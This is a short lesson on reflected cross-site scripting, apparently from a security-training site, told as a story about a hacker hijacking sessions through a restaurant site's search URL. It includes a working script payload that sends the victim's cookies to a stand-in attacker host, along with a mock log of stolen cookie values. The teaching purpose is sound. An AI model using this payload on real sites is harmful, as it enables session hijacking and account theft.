Reflected XSS
Back to All Lessons
Mal is a hacker who has noticed that your site's search function passes search terms in the URL.
He knows the search terms in the URL will get displayed back on the search results page, and he wonders if they are escaped properly.
To test this, he crafts a URL with a snippet of JavaScript in the search parameter.
Sure enough, when he drops the URL in his browser, the injected JavaScript is executed and the browser redirects to his malicious site.
Mal can now checks his server log and hijack Vic's session, since the malicious redirect passed his session ID in the URL.
Let's look in my big book of hacks.
www.welp.com?search=<script>window.location="http://www.haxxed.com?cookie="+document.cookie</script>
All your sessions are belong to us.
The indifferent restaurant review site
I guess you should search for food or something.
Server Logs
http://www.haxxed.com?cookie=asdfefefffasdfCsdfnE
http://www.haxxed.com?cookie=engkelfiAnlJreklfNkl
http://www.haxxed.com?cookie=SneklfjsdkleekflaAne
http://www.haxxed.com?cookie=asFFEfn222fefeknladf
Webpage HTML
<div class="search-terms">
  Search results for "<script>
    window.location="http://www.haxxed.com?cookie="+document.cookie
  </script>"
</div>

<h6>No results found</h6>
The indifferent restaurant review site

Search results for ""

This seems relevant to my interests.
Where's this taco then?
I am not having a good day.
Is your website vulnerable to XSS?
Check today. Scan your website for Reflected XSS and other vulnerabilities with